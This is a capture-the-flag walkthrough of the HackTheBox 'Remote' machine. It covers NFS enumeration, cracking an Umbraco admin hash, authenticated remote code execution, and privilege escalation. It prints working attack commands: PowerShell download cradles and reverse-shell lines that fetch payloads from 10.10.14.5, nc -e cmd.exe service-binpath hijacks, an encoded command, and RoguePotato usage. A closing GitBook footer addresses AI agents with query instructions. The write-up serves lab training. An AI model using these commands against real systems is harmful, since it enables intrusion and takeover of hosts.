> For the complete documentation index, see [llms.txt](https://akshaydeepakshinde.gitbook.io/hackthebox-windows/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://akshaydeepakshinde.gitbook.io/hackthebox-windows/hackthebox-remote.md).
# HackTheBox - Remote
### Nmap scan results
```csharp
nmap -p- -A -T4 -oA nmap-remote 10.10.10.180
```
Let's enumerate the FTP Server and see if we can get any **`sensitive/conf`** files.
### Enumerating webserver (Microsoft HTTPAPI)
There's a [Umbraco ](https://umbraco.com/)CMS (Content Management System) running and we can search for potential exploits, but first we will run a gobuster scan in the background.
> Umbraco is an open-source content management system platform for publishing content on the World Wide Web and intranets. It is written in C# and deployed on Microsoft based infrastructure.
```csharp
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.180/ -o gob-dir-scan.out -t 50
```
**There are certain exploits available for this CMS but we need to enumerate the version used.**
### Mounting the [NFS ](https://www.datto.com/blog/what-is-nfs-file-share)Share
{% hint style="info" %}
**NFS**, or Network File System, is a collaboration system developed by Sun Microsystems in the early 80s that allows users to view, store, update or **share** files on a remote computer as though it was a local computer.
{% endhint %}
```csharp
mount -t nfs 10.10.10.180:/site_backups /mnt/backups -o nolock
```
So the configuration file for Umbraco CMS is stored in **`Umbraco.sdf`** file which contains the usernames and passwords. The file is located at **`App_data/Umbraco.sdf`**
I actually ran **strings** on Umbraco.sdf file to get the credentials for admin. We will also need to verify the version used. Check **`Web.config`** file
Get the SHA-1 hash for admin and crack it using **John** or **hashcat**.
Now that we have credentials, we can try to exploit that **`(Authenticated) Remote Code Execution`**
### Exploiting Umbraco's RCE (Authenticated)
This is the vulnerable page at **`http://10.10.10.180/umbraco/developer/Xslt/xsltVisualize.aspx`**
```markup
public string xml()
{
string cmd = ""; System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "";
proc.StartInfo.Arguments = cmd;
proc.StartInfo.UseShellExecute = false;
proc.StartInfo.RedirectStandardOutput = true;
proc.Start(); string output = proc.StandardOutput.ReadToEnd();
return output;
}
```
### Using [nishang's](https://github.com/samratashok/nishang/tree/master/Shells) powershell script to get a reverse shell
```c
python3 exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180/ -c powershell -a "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5:8000/shell.ps1')"
```
### Running winpeas.exe (Privilege Escalation)
```c
certutil.exe -urlcache -f http://10.10.14.5:8000/winpeas.exe winpeas.exe
```
> If the group "Authenticated users" has **SERVICE\_ALL\_ACCESS** in a service, then it can modify the binary that is being executed by the service. To modify it and execute **nc** you can do:
{% embed url="" %}
```bash
sc config binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config binpath= "net localgroup administrators username /add"
sc config binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"
sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"
```
```bash
echo "Iex(New-Object Net.WebClient).downloadString('http://10.10.14.5:8000/shell.ps1')" | iconv -t utf-16le | base64 -w 0
```
```bash
sc.exe config UsoSvc binpath= "cmd.exe /c powershell.exe -EncodedCommand SQBlAHgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AY
QBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADUAOgA4ADAAMAAwAC8AcwBoAGUAbABsAC4AcABzADEAJwApAAoA"
sc.exe start usosvc
```
### Trying Rogue Potato Attack
{% embed url="" %}
Download the exploit from [here ](https://github.com/antonioCoco/RoguePotato/releases/tag/1.0)and transfer it to the target machine using **`certutil.exe`**
```cpp
certutil.exe -urlcache -f http://10.10.14.5:8000/RogueOxidResolver.exe RogueOxidResolver.exe
certutil.exe -urlcache -f http://10.10.14.5:8000/RoguePotato.exe RoguePotato.exe
```
The exploit doesn't work without providing **CLSID**, we can get **CLSID** for UsoSvc service from [here](http://ohpe.it/juicy-potato/CLSID/Windows_10_Enterprise/).
> A CLSID is a globally unique identifier that identifies a COM class object. If your server or container allows linking to its embedded objects, you need to register a CLSID for each supported class of objects.
```cpp
.\RoguePotato.exe -r 10.10.14.5 -e "powershell.exe -Enc SQBlAHgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADUAOgA4ADAAMAAwAC8AcwBoAGUAbABsAC4AcABzADEAJwApAAoA" -l 9999 -c "{B91D5831-B1BD-4608-8198-D72E155020F7}"
```
---
# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.
## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://akshaydeepakshinde.gitbook.io/hackthebox-windows/hackthebox-remote.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.